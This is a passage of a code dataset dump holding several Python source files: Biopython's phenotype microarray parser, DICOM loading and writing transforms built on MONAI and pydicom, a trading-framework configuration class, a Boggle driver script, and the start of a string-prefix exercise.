plate is None:\n self.plate = PlateRecord(None)\n else:\n self.plate = plate\n\n self.id = wellid\n\n # Curve parameters (to be calculated with the \"fit\" function)\n # Parameters that don't need scipy\n self.max = None\n self.min = None\n self.average_height = None\n\n # Parameters that need scipy\n self.area = None\n self.plateau = None\n self.slope = None\n self.lag = None\n self.v = None\n self.y0 = None\n self.model = None\n\n # Original signals (private)\n if signals is None:\n self._signals = {}\n else:\n self._signals = signals\n\n def _interpolate(self, time):\n \"\"\"Linear interpolation of the signals at certain time points (PRIVATE).\"\"\"\n times = sorted(self._signals.keys())\n\n return np.interp(\n time, times, [self._signals[x] for x in times], left=np.nan, right=np.nan\n )\n\n def __setitem__(self, time, signal):\n \"\"\"Assign a signal at a certain time point.\"\"\"\n try:\n time = float(time)\n except ValueError:\n raise ValueError(\"Time point should be a number\")\n try:\n signal = float(signal)\n except ValueError:\n raise ValueError(\"Signal should be a number\")\n\n self._signals[time] = signal\n\n def __getitem__(self, time):\n \"\"\"Return a subset of signals or a single signal.\"\"\"\n if isinstance(time, slice):\n # Fix the missing values in the slice\n if time.start is None:\n start = 0\n else:\n start = time.start\n\n if time.stop is None:\n stop = max(self.get_times())\n else:\n stop = time.stop\n\n time = np.arange(start, stop, time.step)\n return list(self._interpolate(time))\n\n elif isinstance(time, int) or isinstance(time, float):\n return self._interpolate(time)\n\n raise ValueError(\"Invalid index\")\n\n def __iter__(self):\n for 
time in sorted(self._signals.keys()):\n yield time, self._signals[time]\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n if list(self._signals.keys()) != list(other._signals.keys()):\n return False\n # Account for the presence of NaNs\n for k in self._signals:\n if np.isnan(self[k]) and np.isnan(other[k]):\n continue\n elif self[k] != other[k]:\n return False\n return True\n else:\n return False\n\n def __add__(self, well):\n \"\"\"Add another WellRecord object.\n\n A new WellRecord object is returned, having the same id as the\n left operand\n \"\"\"\n if not isinstance(well, WellRecord):\n raise TypeError(\"Expecting a WellRecord object\")\n\n signals = {}\n\n times = set(self._signals.keys()).union(set(well._signals.keys()))\n for t in sorted(times):\n signals[t] = self[t] + well[t]\n\n neww = WellRecord(self.id, signals=signals)\n\n return neww\n\n def __sub__(self, well):\n \"\"\"Subtract another WellRecord object.\n\n A new WellRecord object is returned, having the same id as the\n left operand\n \"\"\"\n if not isinstance(well, WellRecord):\n raise TypeError(\"Expecting a WellRecord object\")\n\n signals = {}\n\n times = set(self._signals.keys()).union(set(well._signals.keys()))\n for t in sorted(times):\n signals[t] = self[t] - well[t]\n\n neww = WellRecord(self.id, signals=signals)\n\n return neww\n\n def __len__(self):\n \"\"\"Return the number of time points sampled.\"\"\"\n return len(self._signals)\n\n def __repr__(self):\n \"\"\"Return a (truncated) representation of the signals for debugging.\"\"\"\n if len(self) > 7:\n # Shows the last time point and the first five\n return \"%s('%s, ..., %s')\" % (\n self.__class__.__name__,\n \", \".join([str(x) for x in self.get_raw()[:5]]),\n str(self.get_raw()[-1]),\n )\n else:\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \", \".join([str(x) for x in self.get_raw()]),\n )\n\n def __str__(self):\n \"\"\"Return a human readable summary of the record (string).\n\n The python built-in function str works by calling the object's __str__\n method. 
e.g.\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> record = plate['A05']\n >>> print(record)\n Plate ID: PM01\n Well ID: A05\n Time points: 384\n Minimum signal 0.25 at time 13.00\n Maximum signal 19.50 at time 23.00\n WellRecord('(0.0, 14.0), (0.25, 13.0), (0.5, 15.0), (0.75, 15.0), (1.0, 16.0), ..., (95.75, 16.0)')\n\n Note that long time spans are shown truncated.\n \"\"\"\n lines = []\n if self.plate and self.plate.id:\n lines.append(f\"Plate ID: {self.plate.id}\")\n if self.id:\n lines.append(f\"Well ID: {self.id}\")\n lines.append(\"Time points: %i\" % len(self))\n lines.append(\"Minimum signal %.2f at time %.2f\" % min(self, key=lambda x: x[1]))\n lines.append(\"Maximum signal %.2f at time %.2f\" % max(self, key=lambda x: x[1]))\n lines.append(repr(self))\n return \"\\n\".join(lines)\n\n def get_raw(self):\n \"\"\"Get a list of time/signal pairs.\"\"\"\n return [(t, self._signals[t]) for t in sorted(self._signals.keys())]\n\n def get_times(self):\n \"\"\"Get a list of the recorded time points.\"\"\"\n return sorted(self._signals.keys())\n\n def get_signals(self):\n \"\"\"Get a list of the recorded signals (ordered by collection time).\"\"\"\n return [self._signals[t] for t in sorted(self._signals.keys())]\n\n def fit(self, function=(\"gompertz\", \"logistic\", \"richards\")):\n \"\"\"Fit a sigmoid function to this well and extract curve parameters.\n\n If function is None or an empty tuple/list, then no fitting is done.\n Only the object's ``.min``, ``.max`` and ``.average_height`` are\n calculated.\n\n By default the following fitting functions will be used in order:\n - gompertz\n - logistic\n - richards\n\n The first function that is successfully fitted to the signals will\n be used to extract the curve parameters and update ``.area`` and\n ``.model``. 
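A successful fit also updates the ``.plateau``, ``.slope``, ``.lag``, ``.v`` and ``.y0`` attributes.\n 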
If no function can be fitted an exception is raised.\n\n The function argument should be a tuple or list of any of these three\n function names as strings.\n\n There is no return value.\n \"\"\"\n avail_func = (\"gompertz\", \"logistic\", \"richards\")\n\n # Parameters not dependent on curve fitting\n self.max = max(self, key=lambda x: x[1])[1]\n self.min = min(self, key=lambda x: x[1])[1]\n\n self.average_height = np.array(self.get_signals()).mean()\n\n if not function:\n self.area = None\n self.model = None\n return\n for sigmoid_func in function:\n if sigmoid_func not in avail_func:\n raise ValueError(f\"Fitting function {sigmoid_func!r} not supported\")\n\n # Parameters that depend on scipy curve_fit\n from .pm_fitting import fit, get_area\n from .pm_fitting import logistic, gompertz, richards\n\n function_map = {\n \"logistic\": logistic,\n \"gompertz\": gompertz,\n \"richards\": richards,\n }\n\n self.area = get_area(self.get_signals(), self.get_times())\n\n self.model = None\n for sigmoid_func in function:\n func = function_map[sigmoid_func]\n try:\n (self.plateau, self.slope, self.lag, self.v, self.y0), pcov = fit(\n func, self.get_times(), self.get_signals()\n )\n\n self.model = sigmoid_func\n return\n except RuntimeError:\n continue\n raise RuntimeError(\"Could not fit any sigmoid function\")\n\n\ndef JsonIterator(handle):\n \"\"\"Iterate over PM json records as PlateRecord objects.\n\n Arguments:\n - handle - input file\n\n \"\"\"\n try:\n data = json.load(handle)\n except ValueError:\n raise ValueError(\"Could not parse JSON file\")\n\n # We can have one single plate or several\n # we need to discriminate\n if hasattr(data, \"keys\"):\n data = [data]\n\n for pobj in data:\n try:\n plateID = pobj[_csvData][_plate]\n except TypeError:\n raise TypeError(\"Malformed JSON input\")\n except KeyError:\n raise KeyError(\"Could not retrieve plate id\")\n\n # Parse also non-standard plate IDs\n if not plateID.startswith(_platesPrefix) and not plateID.startswith(\n _platesPrefixMammalian\n ):\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\", BiopythonParserWarning\n )\n else:\n # Simplify the plates IDs, removing letters, as opm does\n if plateID.startswith(_platesPrefixMammalian):\n pID = plateID[len(_platesPrefixMammalian) :]\n else:\n pID = plateID[len(_platesPrefix) :]\n while len(pID) > 0:\n try:\n int(pID)\n break\n except ValueError:\n pID = pID[:-1]\n\n # No luck\n if len(pID) == 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\", BiopythonParserWarning\n )\n elif int(pID) < 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID}), using {_platesPrefix}{abs(int(pID))}\"\n )\n plateID = _platesPrefix + str(abs(int(pID)))\n else:\n if plateID.startswith(_platesPrefixMammalian):\n plateID = _platesPrefixMammalian + \"%02d\" % int(pID)\n else:\n plateID = _platesPrefix + \"%02d\" % int(pID)\n\n try:\n times = pobj[_measurements][_hour]\n except KeyError:\n raise KeyError(\"Could not retrieve the time points\")\n\n plate = PlateRecord(plateID)\n\n for k in pobj[_measurements]:\n # Skip the time points\n if k == _hour:\n continue\n\n plate[k] = WellRecord(\n k,\n plate=plate,\n signals={\n times[i]: pobj[_measurements][k][i] for i in range(len(times))\n },\n )\n\n # Remove the measurements and assign the other qualifiers\n del pobj[\"measurements\"]\n plate.qualifiers = pobj\n\n yield plate\n\n\ndef CsvIterator(handle):\n \"\"\"Iterate over PM csv records as PlateRecord objects.\n\n Arguments:\n - handle - input file\n\n \"\"\"\n plate = None\n 
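# Parser state: 'data' turns True once the Hour header row has been seen\n 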
data = False\n qualifiers = {}\n idx = {}\n wells = {}\n\n tblreader = csv.reader(handle, delimiter=\",\", quotechar='\"')\n for line in tblreader:\n if len(line) < 2:\n continue\n\n elif _datafile in line[0].strip():\n # Do we have a previous plate?\n if plate is not None:\n qualifiers[_csvData][_datafile] = line[1].strip()\n plate = PlateRecord(plate.id)\n for k, v in wells.items():\n plate[k] = WellRecord(k, plate, v)\n plate.qualifiers = qualifiers\n yield plate\n plate = PlateRecord(None)\n data = False\n qualifiers[_csvData] = {}\n idx = {}\n wells = {}\n\n elif _plate in line[0].strip():\n plateID = line[1].strip()\n\n qualifiers[_csvData][_plate] = plateID\n\n # Parse also non-standard plate IDs\n if not plateID.startswith(_platesPrefix) and not plateID.startswith(\n _platesPrefixMammalian\n ):\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\", BiopythonParserWarning\n )\n else:\n # Simplify the plates IDs, removing letters, as opm does\n if plateID.startswith(_platesPrefixMammalian):\n pID = plateID[len(_platesPrefixMammalian) :]\n else:\n pID = plateID[len(_platesPrefix) :]\n while len(pID) > 0:\n try:\n int(pID)\n break\n except ValueError:\n pID = pID[:-1]\n\n # No luck\n if len(pID) == 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\",\n BiopythonParserWarning,\n )\n elif int(pID) < 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID}), using {_platesPrefix}{abs(int(pID))}\"\n )\n plateID = _platesPrefix + str(abs(int(pID)))\n else:\n if plateID.startswith(_platesPrefixMammalian):\n plateID = _platesPrefixMammalian + \"%02d\" % int(pID)\n else:\n plateID = _platesPrefix + \"%02d\" % int(pID)\n\n plate.id = plateID\n\n elif _strainType in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_strainType] = line[1].strip()\n\n elif _sample in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_sample] = line[1].strip()\n\n elif _strainNumber in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_strainNumber] = line[1].strip()\n\n elif _strainName in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_strainName] = line[1].strip()\n\n elif _other in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_other] = line[1].strip()\n\n elif _file in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_file] = line[1].strip()\n\n elif _position in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_position] = line[1].strip()\n\n elif _setupTime in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_setupTime] = line[1].strip()\n\n elif _hour in line[0].strip():\n if plate is None:\n continue\n data = True\n for i in range(1, len(line)):\n x = line[i]\n if x == \"\":\n continue\n wells[x.strip()] = {}\n idx[i] = x.strip()\n\n elif data:\n if plate is None:\n continue\n\n # Workaround for bad-formatted files\n try:\n float(line[0])\n except ValueError:\n continue\n\n time = float(line[0])\n\n for i in range(1, len(line)):\n x = line[i]\n\n try:\n signal = float(x)\n except ValueError:\n continue\n\n well = idx[i]\n wells[well][time] = signal\n\n if plate is not None and plate.id is not None:\n plate = PlateRecord(plate.id)\n for k, v in wells.items():\n plate[k] = WellRecord(k, plate, v)\n plate.qualifiers = qualifiers\n yield plate\n\n\ndef _toOPM(plate):\n \"\"\"Transform a PlateRecord object into a dictionary (PRIVATE).\"\"\"\n d = dict(plate.qualifiers.items())\n\n d[_csvData] = {}\n 
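# Rebuild the opm-style dictionary: plate id under csv_data, then per-well time courses\n 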
d[_csvData][_plate] = plate.id\n d[_measurements] = {}\n d[_measurements][_hour] = []\n times = set()\n for wid, w in plate._wells.items():\n d[_measurements][wid] = []\n for hour in w._signals:\n times.add(hour)\n\n for hour in sorted(times):\n d[_measurements][_hour].append(hour)\n for wid, w in plate._wells.items():\n if hour in w._signals:\n d[_measurements][wid].append(w[hour])\n # This shouldn't happen\n else:\n d[_measurements][wid].append(float(\"nan\"))\n\n return d\n\n\nclass JsonWriter:\n \"\"\"Class to write PM Json format files.\"\"\"\n\n def __init__(self, plates):\n \"\"\"Initialize the class.\"\"\"\n self.plates = plates\n\n def write(self, handle):\n \"\"\"Write this instance's plates to a file handle.\"\"\"\n out = []\n for plate in self.plates:\n try:\n out.append(_toOPM(plate))\n except ValueError:\n raise ValueError(\"Could not export plate(s) in JSON format\")\n\n handle.write(json.dumps(out) + \"\\n\")\n\n return len(out)\n\n\nif __name__ == \"__main__\":\n from Bio._utils import run_doctest\n\n run_doctest(verbose=0)\n","repo_name":"biopython/biopython","sub_path":"Bio/phenotype/phen_micro.py","file_name":"phen_micro.py","file_ext":"py","file_size_in_byte":36557,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"28118122853","text":"import os\nfrom pathlib import Path\n\nimport numpy as np\nimport pydicom\nimport torch\nfrom monai.transforms import (\n InvertibleTransform,\n MapTransform,\n TraceableTransform,\n Transform,\n)\nfrom monai.utils import ensure_tuple, ensure_tuple_rep\nfrom pydicom import dcmread\nfrom pydicom.dataset import Dataset, FileDataset\nfrom pydicom.multival import MultiValue\nfrom pydicom.uid import ImplicitVRLittleEndian\nfrom pydicom.valuerep import PersonName\n\n\nclass Renamed(MapTransform, InvertibleTransform, TraceableTransform):\n \"\"\"This transform changes the name of the key in a dictionary dataset.\n Careful: rename each key separately.\n \"\"\"\n\n def __init__(self, keys, src_key, dst_key, allow_missing_keys):\n super().__init__(keys, allow_missing_keys)\n self.keys = keys\n self.dst_key = dst_key\n self.src_key = src_key\n\n def __call__(self, data):\n d = dict(data)\n keys = d.keys()\n if self.src_key in keys:\n element = d[self.src_key]\n d.pop(self.src_key)\n d[self.dst_key] = element\n return d\n\nclass PopKeyd(MapTransform, InvertibleTransform, TraceableTransform):\n \"\"\"This transform deletes the name of a key in a dictionary dataset.\n Careful: rename each key separately.\n \"\"\"\n\n def __init__(self, keys, src_key, allow_missing_keys):\n super().__init__(keys, allow_missing_keys)\n self.keys = keys\n self.src_key = src_key\n\n def __call__(self, data):\n d = dict(data)\n keys = d.keys()\n if self.src_key in keys:\n d.pop(self.src_key)\n return d\n\n\nclass Write_dicom(Transform):\n \"\"\"\n This transforms writes and saves arrays to DICOM format.\n \"\"\"\n\n def __init__(self, save: bool, save_location: str = None):\n self.save = save\n\n def __call__(self, array, as_dicom, save_location):\n meta = pydicom.dcmread(as_dicom)\n array = (array * 255**2).astype(np.uint16)\n ## Creating the header information\n file_meta = Dataset()\n file_meta.TransferSyntaxUID = ImplicitVRLittleEndian\n file_meta.MediaStorageSOPClassUID = meta.file_meta.MediaStorageSOPClassUID\n file_meta.MediaStorageSOPInstanceUID = meta.file_meta.MediaStorageSOPInstanceUID\n file_meta.ImplementationClassUID = meta.file_meta.ImplementationClassUID\n\n ## Creating the UID information in 
the metadata\n ds = FileDataset(save_location, {}, file_meta=file_meta, preamble=b\"\\0\" * 128)\n ds.Modality = meta.Modality\n ds.ContentDate = meta.ContentDate\n ds.ContentTime = meta.ContentTime\n ds.StudyInstanceUID = meta.StudyInstanceUID\n ds.SeriesInstanceUID = meta.SeriesInstanceUID\n ds.SOPInstanceUID = meta.SOPInstanceUID\n ds.SOPClassUID = meta.SOPClassUID\n\n ## These are the necessary imaging components of the FileDataset object.\n ds.SamplesPerPixel = meta.SamplesPerPixel\n ds.PhotometricInterpretation = meta.PhotometricInterpretation\n ds.PixelRepresentation = meta.PixelRepresentation\n ds.BitsStored = array[0][0].nbytes * 8\n ds.BitsAllocated = array[0][0].nbytes * 8\n ds.SmallestImagePixelValue = array.min().tobytes()\n ds.LargestImagePixelValue = array.max().tobytes()\n ds.Columns = array.shape[0]\n ds.Rows = array.shape[1]\n ds.PixelSpacing = meta.PixelSpacing\n\n ## Creating some necessary metadata keys for future transforms such as Cropd\n ds.RescaleSlope = meta.RescaleSlope\n ds.ImageOrientationPatient = meta.ImageOrientationPatient\n ds.ImagePositionPatient = meta.ImagePositionPatient\n ds.RescaleIntercept = meta.RescaleIntercept\n\n ## Saving the pixel data\n ds.PixelData = array.tobytes()\n\n if self.save:\n pydicom.dcmwrite(save_location, dataset=ds, write_like_original=False)\n return ds\n return ds\n\n\nclass LoadDicom(Transform):\n \"\"\"\n Load dicom file or files from provided path.\n\n \"\"\"\n\n def __init__(self, image_only: bool = False, dtype=\"float32\") -> None:\n \"\"\"\n Args:\n\n image_only: if True return only the image volume, otherwise return image data array and header dict.\n dtype: if not None convert the loaded image to this data type.\n\n Note:\n\n - The transform returns an image data array if `image_only` is True,\n or a tuple of two elements containing the data array, and the meta data in a dictionary format otherwise.\n\n \"\"\"\n\n self.image_only = image_only\n self.dtype = dtype\n\n def read(self, files):\n \"open data and load it, careful can be a list of dicoms (directory)\"\n if isinstance(files, list):\n files = [filepath for filepath in files if filepath.is_file()]\n\n elif files.is_dir():\n files = [\n sub_filepath\n for sub_filepath in Path(files).glob(\"**/*\")\n if sub_filepath.is_file()\n ]\n\n if not isinstance(files, list):\n files = [files]\n meta = []\n data = []\n for filepath in files:\n img = pydicom.dcmread(filepath)\n data.append(img)\n meta_data = pydicom.dcmread(filepath, stop_before_pixels=True)\n meta.append(meta_data)\n return data, meta\n\n def dictify(self, meta, remove_overlay_data=True):\n\n \"\"\"\n Turns a pydicom Dataset into a dict with keys derived from the Element tags.\n\n Parameters\n ----------\n meta : pydicom.dataset.Dataset\n The Dataset to dictify\n remove_overlay_data : boolean\n Whether to remove the Overlay Data\n\n Returns\n -------\n output : dict\n \"\"\"\n output = dict()\n for elem in meta:\n if not isinstance(elem.value, MultiValue):\n if not isinstance(elem.value, PersonName):\n if elem.VR != \"SQ\":\n output[elem.name] = elem.value\n else:\n output[elem.name] = [self.dictify(item) for item in elem]\n if remove_overlay_data:\n if \"Overlay Data\" in output:\n del output[\"Overlay Data\"]\n return output\n\n def affine2d(self, data):\n \"\"\"\n Returns the affine matrix of a given Dicom. 
For now it only works for 2D slices.\n        The formula for 3D inputs can be found here: https://nipy.org/nibabel/dicom/dicom_orientation.html .\n        \"\"\"\n        F11, F21, F31 = data[0].ImageOrientationPatient[3:]\n        F12, F22, F32 = data[0].ImageOrientationPatient[:3]\n\n        dr, dc = data[0].PixelSpacing\n        Sx, Sy, Sz = data[0].ImagePositionPatient\n\n        return np.array(\n            [\n                [F11 * dr, F12 * dc, 0, Sx],\n                [F21 * dr, F22 * dc, 0, Sy],\n                [F31 * dr, F32 * dc, 0, Sz],\n                [0, 0, 0, 1],\n            ]\n        )\n\n    def get_data(self, data, meta):\n        \"\"\"\n        Gets img array and meta_data.\n        For now, we can't use self.dictify because when we create batches we need to have the exact same keys in the meta_dict.\n        For my data, it is not the case if we use dictify because of the differences within the train dataset.\n        For very regular data that has the exact same header/meta_data, you can uncomment the corresponding line and comment the\n        lines between the stars.\n        \"\"\"\n\n        pix = [0.5, 0.5]\n        shape = data[0].pixel_array.shape\n        affine = self.affine2d(meta)\n\n        # --------uncomment for dictify--------\n        # meta_data = self.dictify(meta[0], remove_overlay_data=True)\n        # -------------------------------------\n\n        # adding the pixel spacing, array shape and affine\n\n        # *******\n        meta_data = dict()\n        meta_data[\"Rescale Slope\"] = float(meta[0][\"RescaleSlope\"].value)\n        meta_data[\"Image Orientation Patient\"] = data[0].ImageOrientationPatient\n        meta_data[\"Image Position Patient\"] = data[0].ImagePositionPatient\n        meta_data[\"Rescale Intercept\"] = float(meta[0][\"RescaleIntercept\"].value)\n        # *******\n\n        meta_data[\"Pixel Spacing\"] = pix\n        meta_data[\"Data Shape\"] = shape\n        meta_data[\"Affine\"] = affine\n\n        scaled = []\n\n        for k in range(len(data)):\n\n            slope = float(meta[k][\"RescaleSlope\"].value)\n            intercept = float(meta[k][\"RescaleIntercept\"].value)\n            scaled_data = data[k].pixel_array * slope + intercept\n            scaled.append(scaled_data)\n\n        if len(data) > 1:\n            output = np.stack(scaled)\n        else:\n            output = scaled_data\n\n        return output, meta_data\n\n    def __call__(self, filename):\n        \"\"\"\n        Load Dicom file and meta data from the given filename(s).\n\n        Args:\n            filename: path file or file-like object or a list of files.\n                will save the filename to meta_data with key `filename_or_obj`.\n                if provided a list of files, use the filename of first file to save,\n                and will stack them together as multi-channels data.\n                if provided directory path instead of file path, will treat it as\n                DICOM images series and read.\n        \"\"\"\n        img, meta = self.read(filename)\n        img_array, meta_data = self.get_data(img, meta)\n        img_array = img_array.astype(self.dtype, copy=False)\n\n        if self.image_only:\n            return img_array\n        meta_data[\n            \"filename_or_obj\"\n        ] = f\"{ensure_tuple(filename)[0]}\"  # Path obj should be strings for data loader\n\n        return img_array, meta_data\n\n\nclass LoadDicomd(MapTransform):\n    \"\"\"\n    Dictionary-based wrapper of LoadDicom.\n    It can load both image data and metadata. 
When loading a list of files in one key,\n the arrays will be stacked and a new dimension will be added as the first dimension\n In this case, the meta data of the first image will be used to represent the stacked result.\n The affine transform of all the stacked images should be same.\n The output metadata field will be created as ``meta_keys`` or ``key_{meta_key_postfix}``.\n\n \"\"\"\n\n def __init__(\n self,\n keys,\n dtype=np.float32,\n meta_keys=None,\n meta_key_postfix: str = \"meta_dict\",\n overwriting: bool = False,\n image_only: bool = False,\n allow_missing_keys: bool = False,\n ) -> None:\n \"\"\"\n Args:\n keys: keys of the corresponding items to be transformed.\n See also: :py:class:`monai.transforms.compose.MapTransform`\n dtype: if not None convert the loaded image data to this data type.\n meta_keys: explicitly indicate the key to store the corresponding meta data dictionary.\n the meta data is a dictionary object which contains: filename, original_shape, etc.\n it can be a sequence of string, map to the `keys`.\n if None, will try to construct meta_keys by `key_{meta_key_postfix}`.\n meta_key_postfix: if meta_keys is None, use `key_{postfix}` to store the metadata of the nifti image,\n default is `meta_dict`. The meta data is a dictionary object.\n For example, load nifti file for `image`, store the metadata into `image_meta_dict`.\n overwriting: whether allow to overwrite existing meta data of same key.\n default is False, which will raise exception if encountering existing key.\n image_only: if True return dictionary containing just only the image volumes, otherwise return\n dictionary containing image data array and header dict per input key.\n allow_missing_keys: don't raise exception if key is missing.\n \"\"\"\n super().__init__(keys, allow_missing_keys)\n self._loader = LoadDicom(image_only, dtype)\n if not isinstance(meta_key_postfix, str):\n raise TypeError(\n f\"meta_key_postfix must be a str but is {type(meta_key_postfix).__name__}.\"\n )\n self.meta_keys = (\n ensure_tuple_rep(None, len(self.keys))\n if meta_keys is None\n else ensure_tuple(meta_keys)\n )\n if len(self.keys) != len(self.meta_keys):\n raise ValueError(\"meta_keys should have the same length as keys.\")\n self.meta_key_postfix = ensure_tuple_rep(meta_key_postfix, len(self.keys))\n self.overwriting = overwriting\n\n def __call__(self, data):\n \"\"\"\n Raises:\n KeyError: When not ``self.overwriting`` and key already exists in ``data``.\n\n \"\"\"\n d = dict(data)\n for key, meta_key, meta_key_postfix in self.key_iterator(\n d, self.meta_keys, self.meta_key_postfix\n ):\n data = self._loader(d[key])\n if self._loader.image_only:\n if not isinstance(data, np.ndarray):\n raise ValueError(\n \"loader must return a numpy array (because image_only=True was used).\"\n )\n d[key] = data\n else:\n if not isinstance(data, (tuple, list)):\n raise ValueError(\n \"loader must return a tuple or list (because image_only=False was used).\"\n )\n d[key] = data[0]\n if not isinstance(data[1], dict):\n raise ValueError(\"metadata must be a dict.\")\n meta_key = meta_key or f\"{key}_{meta_key_postfix}\"\n if meta_key in d and not self.overwriting:\n raise KeyError(\n f\"Meta data with key {meta_key} already exists and overwriting=False.\"\n )\n d[meta_key] = data[1]\n return d\n","repo_name":"Ghitahouir/med_seg","sub_path":"utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":13894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"6574733305","text":"from dataclasses import dataclass\nfrom typing import List, Tuple, Type\n\nfrom melo_fwk.basket.product_basket import ProductBasket\nfrom melo_fwk.basket.strat_basket import StratBasket\nfrom mql.mconfig.common_melo_config import CommonMeloConfig\nfrom mql.mconfig.mql_dict import MqlDict\nfrom mql.mconfig.estimator_config import EstimatorConfigBuilder\nfrom melo_fwk.estimators.pf_allocation_estimator import PFAllocationEstimator\nfrom melo_fwk.market_data.base_market_loader import BaseMarketLoader\nfrom melo_fwk.pfio.base_portfolio_mgr import BasePortfolioManager\nfrom melo_fwk.pose_size import BaseSizePolicy\nfrom melo_fwk.trading_systems import TradingSystem\nfrom melo_fwk.trading_systems.base_trading_system import BaseTradingSystem\nfrom melo_fwk.basket.weights import Weights\n\n@dataclass(frozen=True)\nclass MeloBooksConfig(CommonMeloConfig):\n\tcluster_names: List[str]\n\tproduct_baskets: List[ProductBasket]\n\tstrats_list: List[StratBasket]\n\tpose_size_list: List[BaseSizePolicy]\n\tweights: Weights\n\ttime_period: List[int]\n\testimator_config_: Tuple[Type[PFAllocationEstimator], dict]\n\n\tdef __post_init__(self):\n\t\tassert len(self.product_baskets) == len(self.strats_list), \\\n\t\t\tf\"len product != strat ({len(self.product_baskets)} != {len(self.strats_list)})\"\n\t\tassert len(self.product_baskets) == len(self.pose_size_list), \\\n\t\t\tf\"len product != size_policy ({len(self.product_baskets)} != {len(self.pose_size_list)})\"\n\n\tdef build_trading_systems(self) -> List[BaseTradingSystem]:\n\t\treturn [\n\t\t\tTradingSystem(\n\t\t\t\tname=name,\n\t\t\t\tproduct_basket=p_basket,\n\t\t\t\tstrat_basket=s_basket,\n\t\t\t\tsize_policy=size_policy)\n\t\t\tfor name, p_basket, s_basket, size_policy in zip(\n\t\t\t\tself.cluster_names, self.product_baskets, self.strats_list, self.pose_size_list)\n\t\t]\n\n\t@staticmethod\n\tdef build_config(pf_mgr: BasePortfolioManager, market_db: BaseMarketLoader, quant_query: dict):\n\t\ttime_period, clusters, weights = MeloBooksConfig.load_clusters(pf_mgr, market_db, quant_query)\n\t\treturn MeloBooksConfig(\n\t\t\tname=quant_query.strip_single(\"QueryName\"),\n\t\t\tcluster_names=[c.name for c in clusters],\n\t\t\tproduct_baskets=[c.product_basket for c in clusters],\n\t\t\tstrats_list=[c.strat_basket for c in clusters],\n\t\t\tpose_size_list=[c.size_policy for c in clusters],\n\t\t\treporter_class_=EstimatorConfigBuilder.get_reporter(quant_query),\n\t\t\testimator_config_=EstimatorConfigBuilder.build_estimator(quant_query),\n\t\t\ttime_period=time_period,\n\t\t\tweights=weights,\n\t\t)\n\n\t@staticmethod\n\tdef load_clusters(\n\t\tpf_mgr: BasePortfolioManager,\n\t\tmarket_db: BaseMarketLoader,\n\t\tquant_query: dict\n\t) -> Tuple[List[int], List[BaseTradingSystem], Weights]:\n\n\t\tmql_dict = MqlDict(quant_query)\n\t\tclusters_mql_dict = mql_dict.get_node(\"Clusters\")\n\t\tclusters_name = clusters_mql_dict.parse_list(\"AlphanumList\")\n\t\tclusters_weights = clusters_mql_dict.parse_num_list(\"WeightsList\")\n\t\tclusters_divmult = float(mql_dict.get_node(\"DivMult\"))\n\t\ttime_period_mql_dict = clusters_mql_dict.get_node(\"TimePeriod\")\n\t\ttime_period = time_period_mql_dict.parse_num_list(\"timeperiod\", default=[0, 0], type_=int)\n\n\t\tweights = Weights(\n\t\t\tweights=clusters_weights,\n\t\t\tdivmult=clusters_divmult\n\t\t)\n\n\t\tclusters = [\n\t\t\tpf_mgr.load_portfolio_config(market_db, c_name)\n\t\t\tfor c_name in clusters_name\n\t\t]\n\t\treturn time_period, clusters, weights\n\n\tdef 
build_clusters_estimator(self):\n\t\treturn self.estimator_config_[0](\n\t\t\testimator_params=self.estimator_config_[1],\n\t\t\ttime_period=self.time_period,\n\t\t\ttrading_syst_list=self.build_trading_systems(),\n\t\t\tweights=self.weights,\n\t\t)\n","repo_name":"omarboukhris/melo-fwk","sub_path":"mql/mconfig/melo_books_config.py","file_name":"melo_books_config.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5322713105","text":"# DO NOT MODIFY THIS FILE.\n\nfrom boggle import Boggle\nfrom hash_map import HashMap\nfrom numpy import loadtxt\nimport sys\n\n# The default name of the dictionary file.\ndictionary_file_name = 'dictionary.txt'\n\n# The default seed for randomization value.\nseed_for_randomization = 100\n\n# If the command line argument count is greater than one.\nif len(sys.argv) > 1:\n # Set the seed for randomization value from the first command line argument.\n seed_for_randomization = int(sys.argv[1])\n\n# Set the initial number of buckets in the hash map.\ninitial_number_of_buckets = 16\n\n# Create and load the words array with word strings from the dictionary file.\nwords_array = loadtxt(dictionary_file_name, dtype='str')\n\n# Initialize a hash map to store the dictionary words.\ndictionary_hash_map = HashMap(initial_number_of_buckets)\n\n# For each word in the words array, add it to the dictionary hash map.\nfor word in words_array:\n dictionary_hash_map.add(word.upper())\n\n# Initialize our Boggle instance\nboggle = Boggle(seed_for_randomization, dictionary_hash_map)\n\n# Print the board.\nboggle.print_board()\n\n# Find all words\nfound_words_lists = boggle.find_all_words()\n\n# Print the list of found words.\nprint(found_words_lists)\n\n# Calculate the total points.\ntotal_points = boggle.count_points(found_words_lists)\n\nprint(f\"Total Points: {total_points}\")\n","repo_name":"DavidBalash/csc420-project","sub_path":"one_player_boggle.py","file_name":"one_player_boggle.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28749366329","text":"from typing import List\n\n# Time: O(m*n)\n# Space: O(1)\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n 